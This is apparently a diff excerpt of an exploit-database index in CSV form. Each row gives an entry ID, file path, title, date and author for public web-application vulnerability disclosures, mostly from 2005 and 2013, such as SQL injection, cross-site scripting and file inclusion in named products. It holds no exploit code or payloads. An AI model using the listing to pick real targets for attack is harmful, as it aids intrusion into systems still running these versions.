+25252,exploits/asp/webapps/25252.txt,"BetaParticle blog 2.0/3.0 - dbBlogMX.mdb Direct Request Database Disclosure",2005-03-21,"farhad koosha",webapps,asp, +25253,exploits/asp/webapps/25253.txt,"BetaParticle blog 2.0/3.0 - 'upload.asp' Unauthenticated Arbitrary File Upload",2005-03-21,"farhad koosha",webapps,asp, +25254,exploits/asp/webapps/25254.txt,"BetaParticle blog 2.0/3.0 - 'myFiles.asp' Unauthenticated File Manipulation",2005-03-21,"farhad koosha",webapps,asp, +25257,exploits/php/webapps/25257.txt,"Kayako ESupport 2.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-03-22,"James Bercegay",webapps,php, +25258,exploits/php/webapps/25258.txt,"Phorum 3.x/5.0.x - HTTP Response Splitting",2005-03-22,"Alexander Anisimov",webapps,php, +25260,exploits/php/webapps/25260.txt,"Vortex Portal 2.0 - 'index.php?act' Remote File Inclusion",2005-03-23,"Francisco Alisson",webapps,php, +25261,exploits/php/webapps/25261.txt,"Vortex Portal 2.0 - 'content.php?act' Remote File Inclusion",2005-03-23,"Francisco Alisson",webapps,php, +25262,exploits/php/webapps/25262.txt,"Interspire ArticleLive 2005 - NewComment Cross-Site Scripting",2005-03-23,mircia,webapps,php, +25263,exploits/php/webapps/25263.txt,"DigitalHive 2.0 - 'msg.php' Cross-Site Scripting",2005-03-23,"benji lemien",webapps,php, +25264,exploits/php/webapps/25264.txt,"DigitalHive 2.0 - 'membres.php?mt' Cross-Site Scripting",2005-03-23,"benji lemien",webapps,php, +25265,exploits/php/webapps/25265.txt,"PHPSysInfo 2.0/2.3 - 'sensor_program' Cross-Site Scripting",2005-03-23,"Maksymilian Arciemowicz",webapps,php, +25266,exploits/php/webapps/25266.txt,"PHPSysInfo 2.0/2.3 - 'system_footer.php' Cross-Site Scripting",2005-03-23,"Maksymilian Arciemowicz",webapps,php, +25267,exploits/php/webapps/25267.txt,"Invision Power Board 1.x/2.0 - HTML Injection",2005-03-23,"Woody Hughes",webapps,php, +25269,exploits/jsp/webapps/25269.txt,"Oracle Reports Server 10g - Multiple Cross-Site Scripting Vulnerabilities",2005-03-24,Paolo,webapps,jsp, +25270,exploits/php/webapps/25270.txt,"Topic Calendar 1.0.1 - 'Calendar_Scheduler.php' Cross-Site Scripting",2004-03-24,"Alberto Trivero",webapps,php, +25271,exploits/php/webapps/25271.txt,"Double Choco Latte 0.9.3/0.9.4 - 'main.php' Arbitrary PHP Code Execution",2005-03-24,"James Bercegay",webapps,php, +25272,exploits/php/webapps/25272.txt,"Dream4 Koobi CMS 4.2.3 - 'index.php' Cross-Site Scripting",2005-03-24,mircia,webapps,php, +25273,exploits/php/webapps/25273.txt,"Dream4 Koobi CMS 4.2.3 - 'index.php' SQL Injection",2005-03-24,mircia,webapps,php, +25276,exploits/php/webapps/25276.txt,"PHPMyDirectory 10.1.3 - 'review.php' Multiple Cross-Site Scripting Vulnerabilities",2005-03-25,mircia,webapps,php, +25278,exploits/php/webapps/25278.sh,"ESMI PayPal StoreFront 1.7 - 'pages.php?idpages' SQL Injection",2005-03-26,Dcrab,webapps,php, +25279,exploits/php/webapps/25279.txt,"ESMI PayPal StoreFront 1.7 - 'products1.php?id2' SQL Injection",2005-03-26,Dcrab,webapps,php, +25280,exploits/php/webapps/25280.txt,"ESMI PayPal StoreFront 1.7 - Cross-Site Scripting",2005-03-26,Dcrab,webapps,php, +25282,exploits/php/webapps/25282.txt,"Nuke BookMarks 0.6 - 'Marks.php' Full Path Disclosure",2005-03-26,"Gerardo Astharot Di Giacomo",webapps,php, +25283,exploits/php/webapps/25283.txt,"Nuke BookMarks 0.6 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-26,"Gerardo Astharot Di Giacomo",webapps,php, +25284,exploits/php/webapps/25284.txt,"Nuke BookMarks 0.6 - 'Marks.php' SQL Injection",2005-03-26,"Gerardo Astharot Di Giacomo",webapps,php, +25285,exploits/php/webapps/25285.txt,"MagicScripts E-Store Kit-2 PayPal Edition - Cross-Site Scripting",2005-03-26,Dcrab,webapps,php, +25286,exploits/php/webapps/25286.txt,"MagicScripts E-Store Kit-2 PayPal Edition - Remote File Inclusion",2005-03-26,Dcrab,webapps,php, +25292,exploits/hardware/webapps/25292.txt,"Cisco Linksys E4200 - Multiple Vulnerabilities",2013-05-07,sqlhacker,webapps,hardware, +25298,exploits/php/webapps/25298.txt,"b2evolution 4.1.6 - Multiple Vulnerabilities",2013-05-07,"High-Tech Bridge SA",webapps,php,80 +25299,exploits/php/webapps/25299.txt,"Tkai's Shoutbox - 'Query' Open Redirection",2005-03-28,CorryL,webapps,php, +25300,exploits/php/webapps/25300.txt,"EXoops - Multiple Input Validation Vulnerabilities",2005-03-28,"Diabolic Crab",webapps,php, +25301,exploits/php/webapps/25301.txt,"Valdersoft Shopping Cart 3.0 - Multiple Input Validation Vulnerabilities",2005-03-28,"Diabolic Crab",webapps,php, +25302,exploits/php/webapps/25302.txt,"PHPCOIN 1.2 - 'auxpage.php?page' Traversal Arbitrary File Access",2005-03-29,"James Bercegay",webapps,php, +25304,exploits/php/webapps/25304.py,"MoinMoin - Arbitrary Command Execution",2013-05-08,HTP,webapps,php, +25305,exploits/multiple/webapps/25305.py,"ColdFusion 9-10 - Credential Disclosure",2013-05-08,HTP,webapps,multiple, +33406,exploits/php/webapps/33406.txt,"Horde 3.3.5 - Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",webapps,php, +33407,exploits/php/webapps/33407.txt,"Horde 3.3.5 - '/Administration Interface admin/cmdshell.php?PATH_INFO' Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",webapps,php, +33408,exploits/php/webapps/33408.txt,"Horde 3.3.5 - '/Administration Interface admin/sqlshell.php?PATH_INFO' Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",webapps,php, +25308,exploits/php/webapps/25308.txt,"PhotoPost Pro 5.1 - 'showgallery.php' Multiple Cross-Site Scripting Vulnerabilities",2005-03-28,"Diabolic Crab",webapps,php, +25309,exploits/php/webapps/25309.txt,"PhotoPost Pro 5.1 - 'showmembers.php' Multiple Cross-Site Scripting Vulnerabilities",2005-03-28,"Diabolic Crab",webapps,php, +25310,exploits/php/webapps/25310.txt,"PhotoPost Pro 5.1 - 'Slideshow.php?photo' Cross-Site Scripting",2005-03-28,"Diabolic Crab",webapps,php, +25311,exploits/php/webapps/25311.txt,"PhotoPost Pro 5.1 - 'showmembers.php?sl' SQL Injection",2005-03-28,"Diabolic Crab",webapps,php, +25312,exploits/php/webapps/25312.txt,"PhotoPost Pro 5.1 - 'showphoto.php?photo' SQL Injection",2005-03-28,"Diabolic Crab",webapps,php, +25313,exploits/asp/webapps/25313.txt,"ACS Blog 0.8/0.9/1.0/1.1 - 'Name' HTML Injection",2005-03-28,"Dan Crowley",webapps,asp, +25314,exploits/php/webapps/25314.txt,"The Includer 1.0/1.1 - Remote File Inclusion",2005-03-29,"hoang yen",webapps,php, +25315,exploits/php/webapps/25315.html,"Chatness 2.5 - 'Message Form' HTML Injection",2005-03-29,3nitro,webapps,php, +25316,exploits/php/webapps/25316.txt,"CPG Dragonfly 9.0.2.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-29,mircia,webapps,php, +25317,exploits/php/webapps/25317.txt,"UApplication Ublog 1.0.x - Cross-Site Scripting",2005-03-29,"PersianHacker Team",webapps,php, +25318,exploits/asp/webapps/25318.txt,"Iatek IntranetApp 2.3 - 'ad_click.asp?banner_id' SQL Injection",2005-03-29,"Diabolic Crab",webapps,asp, +25320,exploits/php/webapps/25320.txt,"Lighthouse Development Squirrelcart 1.5.5 - SQL Injection",2005-03-29,"Diabolic Crab",webapps,php, +25323,exploits/php/webapps/25323.txt,"InterAKT Online MX Shop 1.1.1 - SQL Injection",2005-03-31,Dcrab,webapps,php, +25324,exploits/asp/webapps/25324.txt,"ASP-DEV XM Forum RC3 - IMG Tag Script Injection",2005-03-31,Zinho,webapps,asp, +25327,exploits/php/webapps/25327.txt,"Alstrasoft EPay Pro 2.0 - Remote File Inclusion",2005-04-01,Dcrab,webapps,php, +25328,exploits/php/webapps/25328.txt,"Alstrasoft EPay Pro 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-04-01,Dcrab,webapps,php, +25330,exploits/php/webapps/25330.txt,"phpMyAdmin 2.x - Convcharset Cross-Site Scripting",2005-04-03,"Oriol Torrent Santiago",webapps,php, +25331,exploits/cgi/webapps/25331.txt,"SonicWALL SOHO 5.1.7 - Web Interface Multiple Remote Input Validation Vulnerabilities",2005-04-04,"Oliver Karow",webapps,cgi, +25332,exploits/asp/webapps/25332.txt,"SiteEnable - SQL Injection",2005-04-02,Zinho,webapps,asp, +40396,exploits/php/webapps/40396.txt,"MyBB 1.8.6 - SQL Injection",2016-09-19,"Curesec Research Team",webapps,php,80 +25337,exploits/php/webapps/25337.txt,"ProfitCode Software PayProCart 3.0 - 'Usrdetails.php' Cross-Site Scripting",2005-04-05,"Diabolic Crab",webapps,php, +25338,exploits/php/webapps/25338.txt,"profitcode software payprocart 3.0 - Directory Traversal",2005-04-05,"Diabolic Crab",webapps,php, +25339,exploits/php/webapps/25339.txt,"PHP-Nuke 6.x/7.x Your_Account Module - 'Username' Cross-Site Scripting",2005-04-05,sp3x@securityreason.com,webapps,php, +25340,exploits/php/webapps/25340.txt,"PHP-Nuke 6.x/7.x Your_Account Module - Avatarcategory Cross-Site Scripting",2005-04-05,sp3x@securityreason.com,webapps,php, +25341,exploits/php/webapps/25341.html,"PHP-Nuke 6.x/7.x 'Downloads' Module - 'Lid' Cross-Site Scripting",2005-04-05,sp3x@securityreason.com,webapps,php, +25342,exploits/php/webapps/25342.txt,"PHP-Nuke 7.6 Web_Links Module - Multiple Cross-Site Scripting Vulnerabilities",2005-04-06,"Maksymilian Arciemowicz",webapps,php, +25343,exploits/php/webapps/25343.txt,"PHP-Nuke 7.6 - 'banners.php' Cross-Site Scripting",2005-04-06,"Maksymilian Arciemowicz",webapps,php, +25344,exploits/php/webapps/25344.txt,"phpBB 2.0.13 DLMan Pro Module - SQL Injection",2005-04-06,"LovER BOY",webapps,php, +25345,exploits/php/webapps/25345.txt,"phpBB 2.0.13 Linkz Pro Module - SQL Injection",2005-04-06,"LovER BOY",webapps,php, +25346,exploits/asp/webapps/25346.txt,"Active Auction House - 'default.asp' Multiple SQL Injections",2005-04-06,Dcrab,webapps,asp, +25347,exploits/asp/webapps/25347.txt,"Active Auction House - 'ItemInfo.asp' SQL Injection",2005-04-06,Dcrab,webapps,asp, +25348,exploits/asp/webapps/25348.txt,"Active Auction House - 'start.asp?ReturnURL' Cross-Site Scripting",2005-04-06,Dcrab,webapps,asp, +25349,exploits/asp/webapps/25349.txt,"Active Auction House - 'account.asp?ReturnURL' Cross-Site Scripting",2005-04-06,Dcrab,webapps,asp, +25350,exploits/cgi/webapps/25350.txt,"WebWasher CSM 4.4.1 Build 752 Conf Script - Cross-Site Scripting",2005-04-06,"Oliver Karow",webapps,cgi, +25351,exploits/asp/webapps/25351.txt,"Active Auction House - 'sendpassword.asp' Multiple Cross-Site Scripting Vulnerabilities",2005-04-06,Dcrab,webapps,asp, +25352,exploits/asp/webapps/25352.txt,"Active Auction House - 'WatchThisItem.asp' Cross-Site Scripting",2005-04-06,Dcrab,webapps,asp, +25354,exploits/php/webapps/25354.txt,"Ocean12 Membership Manager Pro - Cross-Site Scripting",2005-04-06,Zinho,webapps,php, +25355,exploits/php/webapps/25355.txt,"CubeCart 2.0.x - 'index.php' Multiple Full Path Disclosures",2005-04-06,"John Cobb",webapps,php, +25356,exploits/php/webapps/25356.txt,"CubeCart 2.0.x - 'tellafriend.php?product' Full Path Disclosure",2005-04-06,"John Cobb",webapps,php, +25357,exploits/php/webapps/25357.txt,"CubeCart 2.0.x - 'view_cart.php?add' Full Path Disclosure",2005-04-06,"John Cobb",webapps,php, +25358,exploits/php/webapps/25358.txt,"CubeCart 2.0.x - 'view_product.php?product' Full Path Disclosure",2005-04-06,"John Cobb",webapps,php, +25360,exploits/php/webapps/25360.txt,"PHP-Nuke 7.6 Web_Links Module - Multiple SQL Injections",2005-04-07,"Maksymilian Arciemowicz",webapps,php, +25366,exploits/php/webapps/25366.txt,"PostNuke Phoenix 0.760 RC3 - 'OP' Cross-Site Scripting",2005-04-08,Dcrab,webapps,php, +25367,exploits/php/webapps/25367.txt,"PostNuke Phoenix 0.760 RC3 - 'Module' Cross-Site Scripting",2005-04-08,Dcrab,webapps,php, +25368,exploits/php/webapps/25368.txt,"PostNuke Phoenix 0.760 RC3 - 'SID' SQL Injection",2005-04-08,Dcrab,webapps,php, +25369,exploits/php/webapps/25369.txt,"RadScripts RadBids Gold 2.0 - 'index.php?read' Traversal Arbitrary File Access",2005-04-09,Dcrab,webapps,php, +25370,exploits/php/webapps/25370.txt,"RadScripts RadBids Gold 2.0 - 'index.php?mode' SQL Injection",2005-04-09,Dcrab,webapps,php, +25371,exploits/php/webapps/25371.txt,"RadScripts RadBids Gold 2.0 - 'faq.php?farea' Cross-Site Scripting",2005-04-09,Dcrab,webapps,php, +25372,exploits/php/webapps/25372.txt,"RadScripts RadBids Gold 2.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-04-09,Dcrab,webapps,php, +25373,exploits/php/webapps/25373.txt,"Azerbaijan Development Group AzDGDatingPlatinum 1.1.0 - 'view.php?id' Cross-Site Scripting",2005-04-09,kre0n,webapps,php, +25374,exploits/php/webapps/25374.txt,"Azerbaijan Development Group AzDGDatingPlatinum 1.1.0 - 'view.php?id' SQL Injection",2005-04-09,kre0n,webapps,php, +25376,exploits/php/webapps/25376.txt,"ModernGigabyte ModernBill 4.3 - 'news.php' File Inclusion",2005-04-10,"James Bercegay",webapps,php, +25377,exploits/php/webapps/25377.txt,"ModernGigabyte ModernBill 4.3 - 'C_CODE' Cross-Site Scripting",2005-04-11,"James Bercegay",webapps,php, +25378,exploits/php/webapps/25378.txt,"ModernGigabyte ModernBill 4.3 - 'Aid' Cross-Site Scripting",2005-04-11,"James Bercegay",webapps,php, +25379,exploits/php/webapps/25379.txt,"Zoom Media Gallery 2.1.2 - 'index.php' SQL Injection",2005-04-11,"Andreas Constantinides",webapps,php, +25380,exploits/php/webapps/25380.txt,"Invision Power Board 1.x - 'ST' SQL Injection",2005-04-11,Dcrab,webapps,php, +25381,exploits/php/webapps/25381.txt,"WebCT Discussion Board 4.1 - HTML Injection",2005-04-11,lacertosum,webapps,php, +25382,exploits/php/webapps/25382.txt,"jPORTAL 2.3.1 - 'Banner.php' SQL Injection",2005-04-11,CiNU5,webapps,php, +25390,exploits/asp/webapps/25390.txt,"Comersus Cart 4.0/5.0 - 'Comersus_Search_Item.asp' Cross-Site Scripting",2005-04-12,Lostmon,webapps,asp, +25394,exploits/php/webapps/25394.txt,"Pinnacle Cart - 'index.php' Cross-Site Scripting",2005-04-12,SmOk3,webapps,php, +25398,exploits/php/webapps/25398.txt,"PHPBB2 Plus 1.5 - 'GroupCP.php' Cross-Site Scripting",2005-04-13,Dcrab,webapps,php, +25399,exploits/php/webapps/25399.txt,"PHPBB2 Plus 1.5 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-04-13,Dcrab,webapps,php, +25400,exploits/php/webapps/25400.txt,"PHPBB2 Plus 1.5 - 'Portal.php' Multiple Cross-Site Scripting Vulnerabilities",2005-04-13,Dcrab,webapps,php, +25401,exploits/php/webapps/25401.txt,"PHPBB2 Plus 1.5 - 'viewtopic.php' Cross-Site Scripting",2005-04-13,Dcrab,webapps,php, +25403,exploits/php/webapps/25403.txt,"phpBB Photo Album 2.0.53 Module - 'Album_Cat.php' Cross-Site Scripting",2005-04-13,Dcrab,webapps,php, +25404,exploits/php/webapps/25404.txt,"phpBB Photo Album Module 2.0.53 - 'Album_Comment.php' Cross-Site Scripting",2005-04-13,Dcrab,webapps,php, +25405,exploits/php/webapps/25405.txt,"Getsimple CMS 3.2.1 - Arbitrary File Upload",2013-05-13,"Ahmed Elhady Mohamed",webapps,php, +25409,exploits/php/webapps/25409.txt,"Ajax Availability Calendar 3.x.x - Multiple Vulnerabilities",2013-05-13,AtT4CKxT3rR0r1ST,webapps,php, +25410,exploits/php/webapps/25410.txt,"Joomla! Component com_s5clanroster - 'id' SQL Injection",2013-05-13,AtT4CKxT3rR0r1ST,webapps,php, +25412,exploits/ios/webapps/25412.txt,"Wireless Disk PRO 2.3 iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,webapps,ios, +25413,exploits/hardware/webapps/25413.txt,"Wifi Photo Transfer 2.1/1.1 PRO - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,webapps,hardware, +25414,exploits/ios/webapps/25414.txt,"Wifi Album 1.47 iOS - Command Injection",2013-05-13,Vulnerability-Lab,webapps,ios, +25415,exploits/ios/webapps/25415.txt,"Wireless Photo Access 1.0.10 iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,webapps,ios, +25416,exploits/hardware/webapps/25416.txt,"SimpleTransfer 2.2.1 - Command Injection",2013-05-13,Vulnerability-Lab,webapps,hardware, +25417,exploits/ios/webapps/25417.txt,"File Lite 3.3/3.5 PRO iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,webapps,ios, +25422,exploits/php/webapps/25422.txt,"All4WWW-HomePageCreator 1.0 - 'index.php' Remote File Inclusion",2005-04-14,"Francisco Alisson",webapps,php, +25423,exploits/php/webapps/25423.txt,"SPHPBlog 0.4 - 'search.php' Cross-Site Scripting",2005-04-14,y3dips,webapps,php, +25424,exploits/asp/webapps/25424.txt,"OneWorldStore - 'OWAddItem.asp' SQL Injection",2005-04-14,Dcrab,webapps,asp, +25425,exploits/asp/webapps/25425.txt,"OneWorldStore - 'OWListProduct.asp' Multiple SQL Injections",2005-04-14,Dcrab,webapps,asp, +25426,exploits/asp/webapps/25426.txt,"OneWorldStore - 'OWProductDetail.asp' SQL Injection",2005-04-14,Dcrab,webapps,asp, +25427,exploits/asp/webapps/25427.txt,"OneWorldStore - 'OWContactUs.asp' Cross-Site Scripting",2005-04-14,Dcrab,webapps,asp, +25428,exploits/asp/webapps/25428.txt,"OneWorldStore - 'OWListProduct.asp' Cross-Site Scripting",2005-04-14,Dcrab,webapps,asp, +25430,exploits/php/webapps/25430.txt,"PHP-Nuke 7.6 Surveys Module - HTTP Response Splitting",2005-04-15,Dcrab,webapps,php, +25431,exploits/php/webapps/25431.pl,"Ariadne CMS 2.4 - Remote File Inclusion",2006-10-19,"Fidel Costa",webapps,php, +25432,exploits/php/webapps/25432.txt,"phpBB Remote - 'mod.php' SQL Injection",2005-04-16,"tom cruise",webapps,php, +25433,exploits/php/webapps/25433.txt,"Datenbank Module For phpBB - 'Remote mod.php' Cross-Site Scripting",2005-04-16,"tom cruise",webapps,php, +25434,exploits/php/webapps/25434.txt,"eGroupWare 1.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-04-18,"GulfTech Security",webapps,php, +25435,exploits/php/webapps/25435.txt,"eGroupWare 1.0 - '/sitemgr-site/index.php?category_id' Cross-Site Scripting",2005-04-18,"GulfTech Security",webapps,php, +25436,exploits/php/webapps/25436.txt,"eGroupWare 1.0 - '/tts/index.php?filter' SQL Injection",2005-04-18,"GulfTech Security",webapps,php, +25437,exploits/php/webapps/25437.txt,"eGroupWare 1.0 - 'index.php?cats_app' SQL Injection",2005-04-18,"GulfTech Security",webapps,php, +25438,exploits/php/webapps/25438.txt,"MVNForum 1.0 - Search Cross-Site Scripting",2005-04-18,"hoang yen",webapps,php, +25440,exploits/php/webapps/25440.txt,"WordPress Plugin wp-FileManager - Arbitrary File Download",2013-05-14,ByEge,webapps,php, +25441,exploits/php/webapps/25441.txt,"IPB (Invision Power Board) 1.x?/2.x/3.x - Admin Account Takeover",2013-05-14,"John JEAN",webapps,php, +25442,exploits/php/webapps/25442.txt,"WHMCS 4.x - 'invoicefunctions.php?id' SQL Injection",2013-05-14,"Ahmed Aboul-Ela",webapps,php, +25447,exploits/php/webapps/25447.txt,"Alienvault Open Source SIEM (OSSIM) 4.1.2 - Multiple SQL Injections",2013-05-14,RunRunLevel,webapps,php, +25449,exploits/php/webapps/25449.txt,"UMI CMS 2.9 - Cross-Site Request Forgery",2013-05-14,"High-Tech Bridge SA",webapps,php, +25451,exploits/php/webapps/25451.txt,"phpBB 1.x/2.0.x - Knowledge Base Module 'KB.php' SQL Injection",2005-04-13,deluxe@security-project.org,webapps,php, +25455,exploits/asp/webapps/25455.txt,"OneWorldStore - 'DisplayResults.asp' SQL Injection",2005-04-19,Lostmon,webapps,asp, +25456,exploits/asp/webapps/25456.txt,"OneWorldStore - 'DisplayResults.asp' Cross-Site Scripting",2005-04-19,Lostmon,webapps,asp, +25457,exploits/php/webapps/25457.c,"UBBCentral UBB.Threads 6.0 - 'Printthread.php' SQL Injection",2005-03-11,HLL,webapps,php, +25458,exploits/php/webapps/25458.txt,"CityPost PHP LNKX 52.0 - 'message.php' Cross-Site Scripting",2005-04-19,Thom,webapps,php, +25459,exploits/php/webapps/25459.txt,"CityPost PHP Image Editor M1/M2/M3/Imgsrc/M4 - 'URI' Cross-Site Scripting",2005-04-19,Thom,webapps,php, +25464,exploits/php/webapps/25464.txt,"CityPost Simple PHP Upload - 'Simple-upload-53.php' Cross-Site Scripting",2005-04-19,Thom,webapps,php, +25466,exploits/asp/webapps/25466.txt,"ECommPro 3.0 - 'Admin/login.asp' SQL Injection",2005-04-20,c0d3r,webapps,asp, +25467,exploits/php/webapps/25467.txt,"Netref 4.2 - 'Cat_for_gen.php' Remote PHP Script Injection",2005-04-20,jaguar,webapps,php, +25468,exploits/php/webapps/25468.txt,"PHP Labs - '.proFile' Dir URI Cross-Site Scripting",2005-04-20,sNKenjoi,webapps,php, +25469,exploits/php/webapps/25469.txt,"Ocean12 Calendar Manager 1.0 - Admin Form SQL Injection",2005-04-20,Zinho,webapps,php, +25473,exploits/php/webapps/25473.txt,"PHP Labs - '.proFile' File URI Cross-Site Scripting",2005-04-20,sNKenjoi,webapps,php, +25474,exploits/php/webapps/25474.txt,"phpBB-Auction Module 1.0/1.2 - 'Auction_Rating.php' SQL Injection",2005-04-20,sNKenjoi,webapps,php, +25475,exploits/php/webapps/25475.txt,"phpBB-Auction Module 1.0/1.2 - 'Auction_Offer.php' SQL Injection",2005-04-20,sNKenjoi,webapps,php, +25476,exploits/asp/webapps/25476.txt,"DUportal Pro 3.4 - 'default.asp' Multiple SQL Injections",2005-04-20,Dcrab,webapps,asp, +25477,exploits/asp/webapps/25477.txt,"DUportal Pro 3.4 - 'search.asp?iChannel' SQL Injection",2005-04-20,Dcrab,webapps,asp, +25478,exploits/asp/webapps/25478.txt,"DUportal Pro 3.4 - 'inc_vote.asp' Multiple SQL Injections",2005-04-20,Dcrab,webapps,asp, +25479,exploits/asp/webapps/25479.txt,"DUportal Pro 3.4 - 'result.asp' Multiple SQL Injections",2005-04-20,Dcrab,webapps,asp, +25480,exploits/asp/webapps/25480.txt,"DUportal Pro 3.4 - 'cat.asp' Multiple SQL Injections",2005-04-20,Dcrab,webapps,asp, +25481,exploits/asp/webapps/25481.txt,"DUportal Pro 3.4 - 'detail.asp' Multiple SQL Injections",2005-04-20,Dcrab,webapps,asp, +25482,exploits/asp/webapps/25482.txt,"DUportal 3.1.2 - 'channel.asp?iChannel' SQL Injection",2005-04-20,Dcrab,webapps,asp, +25483,exploits/asp/webapps/25483.txt,"DUportal 3.1.2 - 'inc_poll_voting.asp?DAT_PARENT' SQL Injection",2005-04-20,Dcrab,webapps,asp, +25485,exploits/asp/webapps/25485.txt,"DUportal 3.1.2 - 'type.asp?iCat' SQL Injection",2005-04-20,Dcrab,webapps,asp, +25484,exploits/asp/webapps/25484.txt,"DUportal 3.1.2 - 'inc_rating.asp' Multiple SQL Injections",2005-04-20,Dcrab,webapps,asp, +25488,exploits/php/webapps/25488.txt,"ProfitCode Software PayProCart 3.0 - 'Username' Cross-Site Scripting",2005-04-21,Lostmon,webapps,php, +25489,exploits/php/webapps/25489.txt,"ProfitCode Software PayProCart 3.0 - Ckprvd Cross-Site Scripting",2005-04-21,Lostmon,webapps,php, +25490,exploits/php/webapps/25490.txt,"ProfitCode Software PayProCart 3.0 - AdminShop HDoc Cross-Site Scripting",2005-04-21,Lostmon,webapps,php, +25491,exploits/php/webapps/25491.txt,"ProfitCode Software PayProCart 3.0 - AdminShop ModID Cross-Site Scripting",2005-04-21,Lostmon,webapps,php, +25492,exploits/php/webapps/25492.txt,"ProfitCode Software PayProCart 3.0 - AdminShop TaskID Cross-Site Scripting",2004-04-21,Lostmon,webapps,php, +25493,exploits/php/webapps/25493.txt,"Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting",2013-05-17,r0ng,webapps,php, +25494,exploits/php/webapps/25494.txt,"ProfitCode Software PayProCart 3.0 - AdminShop ProMod Cross-Site Scripting",2005-04-21,Lostmon,webapps,php, +25495,exploits/php/webapps/25495.txt,"ProfitCode Software PayProCart 3.0 - AdminShop MMActionComm Cross-Site Scripting",2005-04-21,Lostmon,webapps,php, +25496,exploits/php/webapps/25496.txt,"PHP-Charts 1.0 - Code Execution",2013-05-17,"fizzle stick",webapps,php, +25498,exploits/asp/webapps/25498.txt,"ASPNuke 0.80 - 'Comments.asp' SQL Injection",2005-04-22,Dcrab,webapps,asp, +25500,exploits/asp/webapps/25500.txt,"ASPNuke 0.80 - 'detail.asp' SQL Injection",2005-04-22,Dcrab,webapps,asp, +25501,exploits/asp/webapps/25501.txt,"ASPNuke 0.80 - 'profile.asp' Cross-Site Scripting",2005-04-22,Dcrab,webapps,asp, +25502,exploits/asp/webapps/25502.txt,"ASPNuke 0.80 - 'Select.asp' Cross-Site Scripting",2005-04-22,Dcrab,webapps,asp, +25503,exploits/php/webapps/25503.txt,"WoltLab Burning Board 2.3.1 - 'thread.php' Cross-Site Scripting",2005-04-22,deluxe89,webapps,php, +25504,exploits/asp/webapps/25504.txt,"Black Knight Forum 4.0 - 'Member.asp' SQL Injection",2005-04-23,Dcrab,webapps,asp, +25505,exploits/asp/webapps/25505.txt,"Black Knight Forum 4.0 - 'forum.asp' SQL Injection",2005-04-23,Dcrab,webapps,asp, +25506,exploits/asp/webapps/25506.txt,"CartWIZ 1.10 - 'AddToCart.asp' SQL Injection",2005-04-23,Dcrab,webapps,asp, +25507,exploits/asp/webapps/25507.txt,"CartWIZ 1.10 - 'ProductCatalogSubCats.asp' SQL Injection",2005-04-23,Dcrab,webapps,asp, +25508,exploits/asp/webapps/25508.txt,"CartWIZ 1.10 - 'ProductDetails.asp' SQL Injection",2005-04-23,Dcrab,webapps,asp, +25509,exploits/asp/webapps/25509.txt,"CartWIZ 1.10 - 'searchresults.asp' PriceTo Argument SQL Injection",2005-04-23,Dcrab,webapps,asp, +25510,exploits/asp/webapps/25510.txt,"CartWIZ 1.10 - 'searchresults.asp' PriceFrom Argument SQL Injection",2005-04-23,Dcrab,webapps,asp, +40395,exploits/php/webapps/40395.txt,"Kajona 4.7 - Cross-Site Scripting / Directory Traversal",2016-09-19,"Curesec Research Team",webapps,php,80 +25511,exploits/asp/webapps/25511.txt,"CartWIZ 1.10 - 'searchresults.asp' idcategory Argument SQL Injection",2005-04-23,Dcrab,webapps,asp, +25512,exploits/asp/webapps/25512.txt,"CartWIZ 1.10 - 'TellAFriend.asp' Cross-Site Scripting",2005-04-23,Dcrab,webapps,asp, +25513,exploits/asp/webapps/25513.txt,"CartWIZ 1.10 - 'AddToWishlist.asp' Cross-Site Scripting",2005-04-23,Dcrab,webapps,asp, +25514,exploits/asp/webapps/25514.txt,"CartWIZ 1.10 - 'Access.asp' Cross-Site Scripting",2005-04-23,Dcrab,webapps,asp, +25515,exploits/asp/webapps/25515.txt,"CartWIZ 1.10 - 'error.asp' Cross-Site Scripting",2005-04-23,Dcrab,webapps,asp, +25516,exploits/asp/webapps/25516.txt,"CartWIZ 1.10 - 'login.asp' Redirect Argument Cross-Site Scripting",2005-04-23,Dcrab,webapps,asp, +25518,exploits/php/webapps/25518.txt,"Exponent CMS 2.2.0 Beta 3 - Multiple Vulnerabilities",2013-05-17,"High-Tech Bridge SA",webapps,php, +25519,exploits/php/webapps/25519.txt,"ZPanel - 'templateparser.class.php' Crafted Template Remote Command Execution",2013-04-16,"Sven Slootweg",webapps,php, +25520,exploits/asp/webapps/25520.txt,"CartWIZ 1.10 - 'login.asp' Message Argument Cross-Site Scripting",2005-04-23,Dcrab,webapps,asp, +25521,exploits/asp/webapps/25521.txt,"CartWIZ 1.10 - 'searchresults.asp' SKU Argument Cross-Site Scripting",2005-04-23,Dcrab,webapps,asp, +25522,exploits/asp/webapps/25522.txt,"CartWIZ 1.10 - 'searchresults.asp' Name Argument Cross-Site Scripting",2005-04-23,Dcrab,webapps,asp, +25523,exploits/php/webapps/25523.txt,"phpBB 2.0.x - 'profile.php' Cross-Site Scripting",2005-04-23,HaCkZaTaN,webapps,php, +25524,exploits/php/webapps/25524.txt,"phpBB 2.0.x - 'viewtopic.php' Cross-Site Scripting",2005-04-23,HaCkZaTaN,webapps,php, +25528,exploits/php/webapps/25528.txt,"WoltLab Burning Board 2.3.1 - 'PMS.php' Cross-Site Scripting",2005-04-25,deluxe89,webapps,php, +25529,exploits/asp/webapps/25529.txt,"StorePortal 2.63 - 'default.asp' Multiple SQL Injections",2005-04-25,Dcrab,webapps,asp, +25530,exploits/asp/webapps/25530.txt,"OneWorldStore - IDOrder Information Disclosure",2005-04-25,Lostmon,webapps,asp, +25531,exploits/php/webapps/25531.html,"PHPMyVisites 1.3 - 'Set_Lang' File Inclusion",2005-04-26,"Max Cerny",webapps,php, 